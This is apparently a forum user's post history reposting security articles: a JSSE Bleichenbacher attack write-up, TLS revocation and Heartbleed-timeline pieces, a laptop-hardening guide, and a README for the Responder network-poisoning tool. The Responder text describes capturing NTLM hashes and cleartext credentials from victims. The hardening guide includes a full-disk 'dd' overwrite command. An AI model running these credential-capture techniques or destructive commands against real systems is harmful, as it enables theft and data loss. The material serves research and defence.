-
Posts
18748 -
Joined
-
Last visited
-
Days Won
719
Everything posted by Nytro
-
Digging Deep Into The Flash Sandboxes Type: Video Tags: Flash Authors: Mark Vincent Yason, Paul Sabanal Event: Black Hat USA 2012 Indexed on: Apr 17, 2014 URL: https://media.blackhat.com/us-12/video/us-12-Sabanal-Digging-Deep-Into-The-Flash-Sandboxes.mp4 File name: us-12-Sabanal-Digging-Deep-Into-The-Flash-Sandboxes.mp4 File size: 162.1 MB MD5: 794e3c2b928a1135b2be260f59610bcaSHA1b6ea828164ff98cb88fba008eff393ac18560071
-
Easter Hack: Even More Critical Bugs in SSL/TLS Implementations It's been some time since my last blog post - time for writing is rare. But today, I'm very happy that Oracle released the brand new April Critical Patch Update, fixing 37 vulnerabilities in our beloved Java (seriously, no kidding - Java is simply a great language!). With that being said, all vulnerabilities reported by my colleagues (credits go to Juraj Somorovsky, Sebastian Schinzel, Erik Tews, Eugen Weiss, Tibor Jager and Jörg Schwenk) and me are fixed and I highly recommend to patch as soon as possible if you are running a server powered by JSSE! Additional results on crypto hardware suffering from vulnerable firmware are ommited at this moment, because the patch(es) isn't/aren't available yet - details follow when the fix(es) is/are ready. To keep this blog post as short as possible I will skip a lot of details, analysis and pre-requisites you need to know to understand the attacks mentioned in this post. If you are interested use the link at the end of this post to get a much more detailed report. Resurrecting Fixed Attacks Do you remember Bleichenbacher's clever million question attack on SSL from 1998? It was believed to be ?xed with the following countermeasure specified in the TLS 1.0 RFC: “The best way to avoid vulnerability to this attack is to treat incorrectly formatted messages in a manner indistinguishable from correctly formatted RSA blocks. Thus, when it receives an incor- rectly formatted RSA block, a server should generate a random 48-byte value and proceed using it as the premaster secret. Thus, the server will act identically whether the received RSA block is correctly encoded or not.” – Source: RFC 2246 In simple words, the server is advised to create a random PreMasterSecret in case of problems during processing of the received, encrypted PreMasterSecret (structure violations, decryption errors, etc.). The server must continue the handshake with the randomly generated PreMasterSecret and perform all subsequent computations with this value. This leads to a fatal Alert when checking the Finished message (because of different key material at client- and server-side), but it does not allow the attacker to distinguish valid from invalid (PKCS#1v1.5 compliant and non-compliant) ciphertexts. In theory, an attacker gains no additional information on the ciphertext if this countermeasure is applied (correctly). Guess what? The fix itself can introduce problems: Different processing times caused by different code branches in the valid and invalid cases What happens if we can trigger Excpetions in the code responsible for branching? If we could trigger different Exceptions, how would that influence the timing behaviour? Let's have a look at the second case first, because it is the easiest one to explain if you are familiar with Bleichenbacher's attack: Exploiting PKCS#1 Processing in JSSE A coding error in the com.sun.crypto.provider.TlsPrfGenerator (missing array length check and incorrect decoding) could be used to force an ArrayIndexOutOfBoundsException during PKCS#1 processing. The Exception finally led to a general error in the JSSE stack which is being communicated to the client in form of an INTERNAL_ERROR SSL/TLS alert message. What can we learn from this? The alert message is only send if we are already inside the PKCS#1 decoding code blocks! With this side channel Bleichenbacher's attack can be mounted again: An INTERNAL_ERROR alert message suggests a PKCS#1 structure that was recognized as such, but contained an error - any other alert message was caused by the different processing branch (the countermeasure against this attack). The side channel is only triggered if the PKCS#1 structure contains a specific structure. This structure is shown below. If a 00 byte is contained in any of the red marked positions the side-channel will help us to recognize these ciphertexts. We tested our resurrected Bleichenbacher attack and were able to get the decrypted PreMasterSecret back. This took about 5h and 460000 queries to the target server for a 2048 bit key. Sounds much? No problem... By using the newest, high performance adaption of the attack (many thanks to Graham Steel for very the helpful discussions!) resulted in only about 73710 queries in mean for a 4096 bit RSA key! This time JSSE was successfully exploited once. But let's have a look on a much more complicated scenario. No obvious presence of a side channel at all Maybe we can use the first case... Secret Depending Processing Branches Lead to Timing Side Channels A conspicuousness with respect to the random PreMasterSecret generation (you remeber, the Bleichenbacher countermeasure) was already obvious during the code analysis of JSSE for the previous attack: The random PreMasterSecret was only generated if problems occured during PKCS#1 decoding. Otherwise, no random bytes were generated (sun.security.ssl.Handshaker.calculateMasterSecret(...)). The question is, how time consuming is the generation of a random PreMasterSecret? Well, it depends and there is no definitive answer to this question. Measuring time for valid and invalid ciphertexts revealed blurred results. But at least, having different branches with different processing times introduces the chance for a timing side channel. This is why OpenSSL was independently patched during our research to guarantee equal processing times for both, valid and invalid ciphertexts. Risks of Modern Software Design To make a long story short, it turned out that not the random number generation caused the timing side channel, but the concept of creating and handling Exceptions. Throwing and catching Exceptions is a very expensive task with regards towards the consumption of processing time. Unfortunately, the Java code responsible for PKCS#1 decoding ( sun.security.rsa.RSAPadding.unpadV15(...)) was written with the best intentions from a developers point of view. It throws Exceptions if errors occur during PKCS#1 decoding. Time measurements revealed significant differences in the response time of a server when confronted with valid/invalid PKCS#1 structures. These differences could even be measured in a live environment (university network) with a lot of traffic and noise on the line. Again, how is this useful? It's always the same - when knowing that the ciphertext reached the PKCS#1 decoding branch, you know it was recognized as PKCS#1 and thus represents a useful and valid side channel for Bleichenbacher's attack. The attack on an OpenJDK 1.6 powered server took about 19.5h and 18600 oracle queries in our live setup! JSSE was hit the second time.... OAEP Comes To The Rescue Some of you might say "Switch to OAEP and all of your problems are gone....". I agree, partly. OAEP will indeed fix a lot of security problems (but definitely not all!), but only if implemented correctly. Manger told us that implementing OAEP the wrong way could have disastrous results. While looking at the OAEP decoding code insun.security.rsa.RSAPadding it turned out that the code contained a behaviour similar to the one described by Manger as problematic. This could have led to another side channel if SSL/TLS did already offer OAEP support.... All the vulnerabilties mentioned in this post are fixed, but others are in the line to follow... We submitted a research paper which will explain the vulnerabilities mentioned here in more depth and the unpublished ones as well, so stay tuned - there's more to come. Many thanks to my fellow researchers Juraj Somorovsky, Sebastian Schinzel, Erik Tews, Eugen Weiss, Tibor Jager and Jörg Schwenk all of our findings wouldn't have been possible without everyones speical contribution. It needs a skilled team to turn theoretical attacks into practice! A more detailed analysis of all vulnerabilities listed here, as well as a lot more on SSL/TLS security can be found in my Phd thesis: 20 Years of SSL/TLS Research: An Analysis of the Internet's Security Foundation. Gepostet vor 3 days ago von Chris Meyer Sursa: Java Security and Related Topics: Easter Hack: Even More Critical Bugs in SSL/TLS Implementations
-
[h=3]No, don't enable revocation checking (19 Apr 2014)[/h] Revocation checking is in the news again because of a large number of revocations resulting from precautionary rotations for servers affected by the OpenSSL heartbeat bug. However, revocation checking is a complex topic and there's a fair amount of misinformation around. In short, it doesn't work and you are no more secure by switching it on. But let's quickly catch up on the background: Certificates bind a public key and an identity (commonly a DNS name) together. Because of the way the incentives work out, they are typically issued for a period of several years. But events occur and sometimes the binding between public key and name that the certificate asserts becomes invalid during that time. In the recent cases, people who ran a server that was affected by the heartbeat bug are worried that their private key might have been obtained by someone else and so they want to invalidate the old binding, and bind to a new public key. However, the old certificates are still valid and so someone who had obtained that private key could still use them. Revocation is the process of invalidating a certificate before its expiry date. All certificates include a statement that essentially says “please phone the following number to check that this certificate has not been revoked”. The term online revocation checking refers to the process of making that phone call. It's not actually a phone call, of course, rather browsers and other clients can use a protocol called OCSP to check the status of a certificate. OCSP supplies a signed statement that says that the certificate is still valid (or not) and, critically, the OCSP statement itself is valid for a much shorter period of time, typically a few days. The critical question is what to do in the event that you can't get an answer about a certificate's revocation status. If you reject certificates when you can't get an answer, that's called hard-fail. If you accept certificates when you can't get an answer that's called soft-fail. Everyone does soft-fail for a number of reasons on top of the general principle that single points of failure should be avoided. Firstly, the Internet is a noisy place and sometimes you can't get through to OCSP servers for some reason. If you fail in those cases then the level of random errors increases. Also, captive portals (e.g. hotel WiFi networks where you have to “login” before you can use the Internet) frequently use HTTPS (and thus require certificates) but don't allow you to access OCSP servers. Lastly, if everyone did hard-fail then taking down an OCSP service would be sufficient to take down lots of Internet sites. That would mean that DDoS attackers would turn their attention to them, greatly increasing the costs of running them and it's unclear whether the CAs (who pay those costs) could afford it. (And the disruption is likely to be significant while they figure that out.) So soft-fail is the only viable answer but it has a problem: it's completely useless. But that's not immediately obvious so we have to consider a few cases: If you're worried about an attacker using a revoked certificate then the attacker first must be able to intercept your traffic to the site in question. (If they can't even intercept the traffic then you didn't need any authentication to protect it from them in the first place.) Most of the time, such an attacker is near you. For example, they might be running a fake WiFi access point, or maybe they're at an ISP. In these cases the important fact is that the attacker can intercept all your traffic, including OCSP traffic. Thus they can block OCSP lookups and soft-fail behaviour means that a revoked certificate will be accepted. The next class of attacker might be a state-level attacker. For example, Syria trying to intercept Facebook connections. These attackers might not be physically close, but they can still intercept all your traffic because they control the cables going into and out of a country. Thus, the same reasoning applies. We're left with cases where the attacker can only intercept traffic between a user and a website, but not between the user and the OCSP service. The attacker could be close to the website's servers and thus able to intercept all traffic to that site, but not anything else. More likely, the attacker might be able to perform a DNS hijacking: they persuade a DNS registrar to change the mapping between a domain (example.com) and its IP address(es) and thus direct the site's traffic to themselves. In these cases, soft-fail still doesn't work, although the reasoning is more complex: Firstly, the attacker can use OCSP stapling to include the OCSP response with the revoked certificate. Because OCSP responses are generally valid for some number of days, they can store one from before the certificate was revoked and use it for as long as it's valid for. DNS hijackings are generally noticed and corrected faster than the OCSP response will expire. (On top of that, you need to worry about browser cache poisoning, but I'm not going to get into that.) Secondly, and more fundamentally, when issuing certificates a CA validates ownership of a domain by sending an email, or looking for a specially formed page on the site. If the attacker is controlling the site, they can get new certificates issued. The original owners might revoke the certificates that they know about, but it doesn't matter because the attacker is using different ones. The true owners could try contacting CAs, convincing them that they are the true owners and get other certificates revoked, but if the attacker still has control of the site, they can hop from CA to CA getting certificates. (And they will have the full OCSP validity period to use after each revocation.) That circus could go on for weeks and weeks. That's why I claim that online revocation checking is useless - because it doesn't stop attacks. Turning it on does nothing but slow things down. You can tell when something is security theater because you need some absurdly specific situation in order for it to be useful. So, for a couple of years now, Chrome hasn't done these useless checks by default in most cases. Rather, we have tried a different mechanism. We compile daily lists of some high-value revocations and use Chrome's auto-update mechanism to push them to Chrome installations. It's called the CRLSet and it's not complete, nor big enough to cope with large numbers of revocations, but it allows us to react quickly to situations like Diginotar and ANSSI. It's certainly not perfect, but it's more than many other browsers do. A powerful attacker may be able to block a user from receiving CRLSet updates if they can intercept all of that user's traffic for long periods of time. But that's a pretty fundamental limit; we can only respond to any Chrome issue, including security bugs, by pushing updates. The original hope with CRLSets was that we could get revocations categorised into important and administrative and push only the important ones. (Administrative revocations occur when a certificate is changed with no reason to suspect that any key compromise occurred.) Sadly, that mostly hasn't happened. Perhaps we need to consider a system that can handle much larger numbers of revocations, but the data in that case is likely to be two orders of magnitude larger and it's very unlikely that the current CRLSet design is still optimal when the goal moves that far. It's also a lot of data for every user to be downloading and perhaps efforts would be better spent elsewhere. It's still the case that an attacker that can intercept traffic can easily perform an SSL Stripping attack on most sites; they hardly need to fight revoked certificates. In order to end on a positive note, I'll mention a case where online revocation checking does work, and another, possible way to solve the revocation problem for browsers. The arguments above started with the point that an attacker using a revoked certificate first needs to be able to intercept traffic between the victim and the site. That's true for browsers, but it's not true for code-signing. In the case where you're checking the signature on a program or document that could be distributed via, say, email, then soft-fail is still valuable. That's because it increases the costs on the attacker substantially: they need to go from being able to email you to needing to be able to intercept OCSP checks. In these cases, online revocation checking makes sense. If we want a scalable solution to the revocation problem then it's probably going to come in the form of short-lived certificates or something like OCSP Must Staple. Recall that the original problem stems from the fact that certificates are valid for years. If they were only valid for days then revocation would take care of itself. (This is the approach taken by DNSSEC.) For complex reasons, it might be easier to deploy that by having certificates that are valid for years, but include a marker in them that indicates that an OCSP response must be provided along with the certificate. The OCSP response is then only valid for a few days and the effect is the same (although less efficient). Sursa: https://www.imperialviolet.org/2014/04/19/revchecking.html
-
Linux /dev/urandom and concurrency Recently I was surprised to find out that a process that I expected to to complete in about 8 hours was still running after 20. Everything appeared to be operating normally. The load on the server was what we expected, IO was minimal, and the external services it was using were responding with latencies that were normal. After tracing one of the sub-processes we noticed that reads from /dev/urandom were not what we expected. It was taking 80-200ms to read 4k from this device. At first I thought that this was an issue with entropy but /dev/urandom is non-blocking so that probably wasn't the issue. I didn't think that 80-200ms was typical so I tried a dd on the system in question and another similar system in production. The system in question took about 3 minutes to write 10Mb while the reference system took about 3s. The only difference between the systems with respect to /dev/urandom was the rate and number of processes reading from the device. The reads were on the order of hundreds per second. The number of processes reading from /dev/urandom made me wonder if maybe there was a spinlock in the kernel in the read code. After looking at the code I found one. You can see the spinlock here in the Linux kernel source code. The author mentions the potential for contention in a thread on the mailing list from December 2004. Fast forward 10 years and contention on this device is a real issue. Our application uses curl from within PHP to fetch data from a cache. The application has to process 10s of millions of text objects and we don't want to wait days for that processing to complete so we split the work of processing each object over N threads. The read from /dev/urandom appears to be coming from ares_init which is being called from curl_easy_init in our version of PHP+curl. Removing the AsynchDNS feature from curl causes the problem to go away (tracing confirms that the read from /dev/urandom is no longer there). You can remove this feature by compiling with --disable-ares. So why is this an issue? I wrote a python script to measure the read times from /dev/urandom as you increase the contention by adding more threads. Here is a plot with the results. Running the same script with a user-land file is more or less linear out to 16 threads. A simple spinlock can have a big impact in the multi-core world of 2014! Sursa: Linux /dev/urandom and concurrency
-
[h=3]A Wake-up Call for SATCOM Security[/h] By Ruben Santamarta @reversemode During the last few months we have witnessed a series of events that will probably be seen as a tipping point in the public’s opinion about the importance of, and need for, security. The revelations of Edward Snowden have served to confirm some theories and shed light on surveillance technologies that were long restricted. We live in a world where an ever-increasing stream of digital data is flowing between continents. It is clear that those who control communications traffic have an upper-hand. Satellite Communications (SATCOM) plays a vital role in the global telecommunications system. Sectors that commonly rely on satellite networks include: Aerospace Maritime Military and governments Emergency services Industrial (oil rigs, gas, electricity) Media It is important to mention that certain international safety regulations for ships such as GMDSS or aircraft's ACARS rely on satellite communication links. In fact, we recently read how, thanks to the SATCOM equipment on board Malaysian Airlines MH370, Inmarsat engineers were able to determine the approximate position of where the plane crashed. IOActive is committed to improving overall security. The only way to do so is to analyze the security posture of the entire supply chain, from the silicon level to the upper layers of software. Thus, in the last quarter of 2013 I decided to research into a series of devices that, although widely deployed, had not received the attention they actually deserve. The goal was to provide an initial evaluation of the security posture of the most widely deployed Inmarsat and Iridium SATCOM terminals. In previous blog posts I've explained the common approach when researching complex devices that are not physically accessible. In these terms, this research is not much different than the previous research: in most cases the analysis was performed by reverse engineering the firmware statically. What about the results? Insecure and undocumented protocols, backdoors, hard-coded credentials...mainly design flaws that allow remote attackers to fully compromise the affected devices using multiple attack vectors. Ships, aircraft, military personnel, emergency services, media services, and industrial facilities (oil rigs, gas pipelines, water treatment plants, wind turbines, substations, etc.) could all be affected by these vulnerabilities. I hope this research is seen as a wake-up call for both the vendors and users of the current generation of SATCOM technology. We will be releasing full technical details in several months, at Las Vegas, so stay tuned. The following white paper comprehensively explains all the aspects of this research http://www.ioactive.com/pdfs/IOActive_SATCOM_Security_WhitePaper.pdf Sursa: IOActive Labs Research: A Wake-up Call for SATCOM Security
-
NBT-NS/LLMNR Responder Laurent Gaffie lgaffie@trustwave.com http://www.spiderlabs.com INTRODUCTION This tool is first an LLMNR, NBT-NS and MDNS responder, it will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answers to File Server Service request, which is for SMB. The concept behind this, is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option to "On" via command line if you want this tool to answer to the Workstation Service request name suffix. FEATURES Built-in SMB Auth server. Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set to On. This functionality is enabled by default when the tool is launched. Built-in MSSQL Auth server. In order to redirect SQL Authentication to this tool, you will need to set the option -r to On(NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008. Built-in HTTP Auth server. In order to redirect HTTP Authentication to this tool, you will need to set the option -r to On for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari. Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can now send your custom files to a victim. Built-in HTTPS Auth server. In order to redirect HTTPS Authentication to this tool, you will need to set the -r option to On for Windows versions older than Vista (NBT-NS queries for HTTP server lookups are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2, and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, and Safari. The folder Cert/ was added and contain 2 default keys, including a dummy private key. This is intentional, the purpose is to have Responder working out of the box. A script was added in case you need to generate your own self signed key pair. Built-in LDAP Auth server. In order to redirect LDAP Authentication to this tool, you will need to set the option -r to On for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin. Built-in FTP Auth server. This module will collect FTP clear text credentials. Built-in small DNS server. This server will answer type A queries. This is really handy when it's combined with ARP spoofing. All hashes are printed to stdout and dumped in an unique file John Jumbo compliant, using this format: (SMB or MSSQL or HTTP)-(ntlm-v1 or v2 or clear-text)-Client_IP.txt The file will be located in the current folder. Responder will logs all its activity to a file Responder-Session.log. When the option -f is set to "On", Responder will fingerprint every host who issued an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode. Browser Listener finds the PDC in stealth mode. Icmp Redirect for MITM on Windows XP/2003 and earlier Domain members. This attack combined with the DNS module is pretty effective. WPAD rogue transparent proxy server. This module will capture all HTTP requests from anyone launching Internet Explorer on the network. This module is higly effective. You can now send your custom Pac script to a victim and inject HTML into the server's responses. See Responder.conf. This module is now enabled by default. Analyze mode: This module allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning any requests. Also, you can map domains, MSSQL servers, workstations passively, see if ICMP Redirects attacks are plausible on your subnet. Responder is now using a configuration file. See Responder.conf. Built-in POP3 auth server. This module will collect POP3 plaintext credentials Built-in SMTP auth server. This module will collect PLAIN/LOGIN clear text credentials. Download: https://github.com/SpiderLabs/Responder/
-
Paranoid security lockdown of laptop What I want to achieve is: Minimize damage done if laptop is stolen Minimize damage done if laptop is tampered with while away from it Minimize chance of being compromised while system is running Maximize chance of detection if system is compromised Maximize anonymity on the internet Security is a tradeoff between usability and risk. This document is for those willing to sacrifice some usability. I suspect the contents of this text will become increasingly more valuable as time goes on. Full disk encryption Disk encryption ensures that files are always stored on disk in an encrypted form. The files only become available to the operating system and applications in readable form while the system is running and unlocked by a trusted user. An unauthorized person looking at the disk contents directly, will only find garbled random-looking data instead of the actual files. For example, this can prevent unauthorized viewing of the data when the computer or hard-disk is: located in a place to which non-trusted people might gain access while you're away lost or stolen, as with laptops, netbooks or external storage devices in the repair shop discarded after its end-of-life In addition, disk encryption can also be used to add some security against unauthorized attempts to tamper with your operating system - for example, the installation of keyloggers or Trojan horses by attackers who can gain physical access to the system while you're away. Preparation Fill drive with random data to prevent recovery of previously stored data. It also prevents detection of usage patterns on drive. dd if=/dev/random of=/dev/sda bs=1M Full disk encryption using dmcrypt + LUKS cryptsetup --cipher aes-xts-plain64 --key-size 512 --hash sha512 --iter-time 5000 --use-random --verify-passphrase luksFormat /dev/sda2 cryptsetup luksOpen /dev/sda2 root mkfs.ext4 /dev/mapper/root mount /dev/mapper/root /mnt mkdir /mnt/boot mount /dev/sda1 /mnt/boot Edit /etc/mkinitcpio.conf and add encrypt and shutdown hook to HOOKS. Place the encrypt hook directly before filesystem hook. And dm_mod and ext4 to MODULES. Edit /etc/default/grub and add GRUB_CMDLINE_LINUX="cryptdevice=/dev/sda2:root" Swap space No. Instead buy enough RAM. BIOS Set a BIOS password. This prevents cold boot attacks where RAM is immediately dumped after a reboot. It has been shown that data in RAM persists for a few seconds after downpowering. USB attacks When a USB device is inserted, the USB driver in kernel is invoked. If a bug is discovered here it may lead to code running: system("killall gnome-screensaver") Or it may slurp up all the memory and cause the linux out-of-memory-killer to kill the screensaver process. USB driver load can be disabled in BIOS. Or you can: echo 'install usb-storage : ' >> /etc/modprobe.conf USB automounting attacks You lesser beings willing to allow the USB driver to load should atleast disable automounting. Allowing filesystems to automount causes even more potentially vulnerable code to run. E.g. Ubuntu once opened the file explorer and showed thumbnails of images. One researcher was able to find a bug in one image library used to produce thumbnail. He just inserted USB drive and the exploit killed the screensaver. Screensaver Set a screensaver with password lock to kick in after one minute. Create keyboard shortcut to lock screen and manually lock when temporarily leaving system. Power down for longer absences. File integrity To detect compromised files, file integrity tools can store hashsums of them and let you know if they suddenly change. Obviously, malware can also modify the hashsums. But it helps in cases where malware do not. For the extra cautious, you could store the file integrity hashsums offline or print them out. AIDE (Advanced intrusion detection environment) aide -i mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz aide -C rkhunter Rootkit Hunter additionally scans system for rootkits. On a clean system update the system properties rkhunter --propupd rkhunter --check --rwo -sk There probably are a few false positives. Edit the /etc/rkhunter.conf.local and add exceptions for them. Here is my crontab for these two programs: MAILTO=me@dvikan.no MAILFROM=me@dvikan.no 30 06 * * 1 /usr/bin/rkhunter --cronjob --rwo 35 06 * * 1 /usr/bin/aide -C Network VPN Use a trusted VPN to make ISP unable to see your traffic. www.ipredator.se To prevent traffic from accidentially flowing via real physical network interface, you should only allow outgoing traffic to be UDP on port 1194. Also for DNS and DHCP, port 53, 67, and 68 outgoing must be allowed. Simple stateful firewall Drop everything in INPUT. Then allow already existing connections. Also allow all to loopback interface. iptables -P INPUT DROP iptables -P FORWARD DROP iptables -P OUTPUT ACCEPT iptables -A INPUT -i lo -j ACCEPT iptables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT iptables -A OUTPUT -o enp2s0 -p udp -m udp --dport 53 -j ACCEPT iptables -A OUTPUT -o enp2s0 -p udp -m udp --dport 1194 -j ACCEPT iptables -A OUTPUT -o tun0 -j ACCEPT iptables -A OUTPUT -o enp2s0 -p udp -m udp --dport 67:68 -j ACCEPT Save rules into file and have it loaded on boot; iptables-save > /etc/iptables/iptables.rules systemctl enable iptables If your VPN does not support ipv6, then drop all outgoing traffic on ipv6: ip6tables -P OUTPUT DROP And add ipv6.disable=1 to kernel line to prevent loading of ipv6 module. DNS Do not use ISPs DNS server. Unless you want them to see the domains you are visiting. https://www.ipredator.se/page/services#service_dns Put this in /etc/resolv.conf nameserver 194.132.32.32 nameserver 46.246.46.246 Preserve DNS settings by adding the following to /etc/dhcpcd.conf nohook resolv.conf MAC address To randomize MAC address and keep vendor prefix: macchanger -e interface After boot, set a random MAC address. Here is an example systemd service which you put in /etc/systemd/system/macchanger@.service. [unit] Description=Macchanger service for %I Documentation=man:macchanger(1) [service] ExecStart=/usr/bin/macchanger -e %I Type=oneshot [install] WantedBy=multi-user.target Then to enable it: systemctl enable macchanger@enp2s0 Firefox Sandbox Sandfox runs programs within sandboxes which limit the programs access to only the files you specify. Why run Firefox and other programs in a sandbox? In the Firefox example, there are many components running: java, javascript, flash, and third-party plugins. All of these can open vulnerabilities due to bugs and malicious code; under certain circumstances these components can run anything on your computer and can access, modify, and delete your files. It's nice to know that when such vulnerabilities are exploited, these components can only see and access a limited subset of your files. Create a sandbox with sandfox: sudo sandfox firefox Do not install flash or java. Disable webrtc to prevent local IP discovery For registration forms use a pseudorandom identity and throwaway email address. Make firefox prefer cipher suites providing forward secrecy. Extentions noscript https everywhere Email Many SMTP and IMAP servers use TLS. Not all do. Email is decrypted at each node. End-to-end encryption makes email secure. The most widely used standard for encrypting files is the OpenPGP standard. GnuPG is a free implementation of it. A short usage summary is: gpg --gen-key # generate keypair gpg --detach-sign --armour file.txt # signature gpg -r 7A2B13CD --armour --sign --encrypt file.txt # signature and encryption TLS gotchas If not all HTTP content is served over TLS, an attacker could inject javascript code which extracts your password. Or simply sniff the session cookie before or after. The bridge between plaintext and TLS in HTTP is a weak point. The HTTP HSTS header mitigates this particular threat. If not a ciphersuite with perfect forward security is used, then an attacker can at later point use the server's private key to decrypt historically captured traffic. Other stuff Do not allow other users to read your files chmod 700 $HOME Some people tend to use the recursive option (-R) indiscriminately which modifies all child folders and files, but this is not necessary, and may yield other undesirable results. The parent directory alone is sufficient for preventing unauthorized access to anything below the parent. Put tape over webcam. Other decent resources Surveillance Self-Defense Written 2014-04-19 by dag Sursa: https://dvikan.no/paranoid-security-lockdown-of-laptop
-
Heartbleed disclosure timeline: who knew what and when April 15, 2014 Ben Grubb Ever since the "Heartbleed" flaw in encryption protocol OpenSSL was made public on April 7 in the US there have been various questions about who knew what and when. Fairfax Media has spoken to various people and groups involved and has compiled the below timeline. If you have further information or corrections - especially information about what occurred prior to March 21 at Google - please email the author: bgrubb@fairfaxmedia.com.au. Click here for his PGP key. All times are in US Pacific Daylight Time Advertisement Friday, March 21 or before - Neel Mehta of Google Security discovers Heartbleed vulnerability. Friday, March 21 10.23 - Bodo Moeller and Adam Langley of Google commit a patch for the flaw (This is according to the timestamp on the patch file Google created and later sent to OpenSSL, which OpenSSL forwarded to Red Hat and others). The patch is then progressively applied to Google services/servers across the globe. Monday, March 31 or before - Someone tells content distribution network CloudFlare about Heartbleed and they patch against it. CloudFlare later boasts on its blog about how they were able to protect their clients before many others. CloudFlare chief executive officer Matthew Prince would not tell Fairfax how his company found out about the flaw early. "I think the most accurate reporting of events with regard to the disclosure process, to the extent I know them, was written by Danny over at the [Wall Street Journal]," he says. The article says CloudFlare was notified of the bug the week before last and made the recommended fix "after signing a non-disclosure agreement". In a seperate article, The Verge reports that a CloudFlare staff member "got an alarming message from a friend" which requested that they send the friend their PGP email encryption key as soon as possible. "Only once a secure channel was established and a non-disclosure agreement was in place could he share the alarming news" about the bug, The Verge reported. On April 17, CloudFlare says in a blog that when it was informed it did not know then that it was among the few to whom the bug was disclosed before the public announcement. "In fact, we did not even know the bug's name. At that time we had simply removed TLS heartbeat functionality completely from OpenSSL..." Tuesday, April 1 - Google Security notifies "OpenSSL team members" about the flaw it has found in OpenSSL, which later becomes known as "Heartbleed", Mark Cox at OpenSSL says on social network Google Plus. Tuesday, April 1 04:09 - "OpenSSL team members" forward Google's email to OpenSSL's "core team members". Cox at OpenSSL says the following on Google Plus: "Original plan was to push [a fix] that week, but it was postponed until April 9 to give time for proper processes." Google tells OpenSSL, according to Cox, that they had "notified some infrastructure providers under embargo". Cox says OpenSSL does not have the names of providers Google told or the dates they were told. Google declined to tell Fairfax which partners it had told. "We aren't commenting on when or who was given a heads up," a Google spokesman said. Wednesday, April 2 ~23:30 - Finnish IT security testing firm Codenomicon separately discovers the same bug that Neel Mehta of Google found in OpenSSL. A source inside the company gives Fairfax the time it was found as 09:30 EEST April 3, which converts to 23:30 PDT, April 2. Thursday, April 3 04:30 - Codenomicon notifies the National Cyber Security Centre Finland (NCSC-FI) about its discovery of the OpenSSL bug. Codenomicon tells Fairfax in a statement that they're not willing to say whether they disclosed the bug to others. "We have strict [non-disclosure agreements] which do not allow us to discuss any customer engagements. Therefore, we do not want to weigh in on the disclosure debate," a company spokeswoman says. A source inside the company later tells Fairfax: "Our customers were not notified. They first learned about it after OpenSSL went public with the information." Friday, April 4 - Content distribution network Akamai patches its servers. They initially say OpenSSL told them about bug but the OpenSSL core team denies this in an email interview with Fairfax. Akamai updates its blog after the denial - prompted by Fairfax - and Akamai's blog now says an individual in the OpenSSL community told them. Akamai's chief security officer, Andy Ellis, tells Fairfax: "We've amended the blog to specific [sic] a member of the community; but we aren't going to disclose our source." It's well known a number of OpenSSL community members work for companies in the tech sector that could be connected to Akamai. Friday, April 4 - Rumours begin to swirl in open source community about a bug existing in OpenSSL, according to one security person at a Linux distribution Fairfax spoke to. No details were apparent so it was ignored by most. Saturday, April 5 15:13 - Codenomicon purchases the Heartbleed.com domain name, where it later publishes information about the security flaw. Saturday, April 5 16:51 - OpenSSL (not public at this point) publishes this (since taken offline) to its Git repository. Sunday, April 6 02:30 - The National Cyber Security Centre Finland asks the CERT Coordination Centre (CERT/CC) in America to be allocated a common vulnerabilites exposure (CVE) number "on a critical OpenSSL issue" without disclosing what exactly the bug is. CERT/CC is located at the Software Engineering Institute, a US government funded research centre operated by Carnegie Mellon University. The centre was created in in 1988 at DARPA's direction in response to the Morris worm incident. Sunday, April 6 ~22:56 - Mark Cox of OpenSSL (who also works for Red Hat and was on holiday) notifies Linux distribution Red Hat about the Heartbleed bug and authorises them to share details of the vulnerability on behalf of OpenSSL to other Linux operating system distributions. Sunday, April 6 22.56 - Huzaifa Sidhpurwala (who works for Red Hat) adds a (then private) bug to Red Hat's bugzilla. Sunday, April 6 23.10 - Huzaifa Sidhpurwala sends an email about the bug to a private Linux distribution mailing list with no details about Heartbleed but an offer to request them privately under embargo. Sidhpurwala says in the email that the issue would be made public on April 9. Cox of OpenSSL says on Google Plus: "No details of the issue are given: just affected versions [of OpenSSL]. Vendors are told to contact Red Hat for the full advisory under embargo." Sunday, April 6 ~23:10 - A number of people on the private mailing list ask Sidhpurwala, who lives in India, for details about the bug. Sidhpurwala gives details of the issue, advisory, and patch to the operating system vendors that replied under embargo. Those who got a response included SuSE (Monday, April 7 at 01:15), Debian (01:16), FreeBSD (01:49) and AltLinux (03:00). “Some other [operating system] vendors replied but [Red Hat] did not give details in time before the issue was public," Cox said. Sidhpurwala was asleep during the time the other operating system vendors requested details. "Some of them mailed during my night time. I saw these emails the next day, and it was pointless to answer them at that time, since the issue was already public," Sidhpurwala says. Those who attempted to ask and were left without a response included Ubuntu (asked at 04:30), Gentoo (07:14) and Chromium (09:15), says Cox. Prior to Monday, April 7 or early April 7 - Facebook gets a heads up, people familiar with matter tell the Wall Street Journal. Facebook say after the 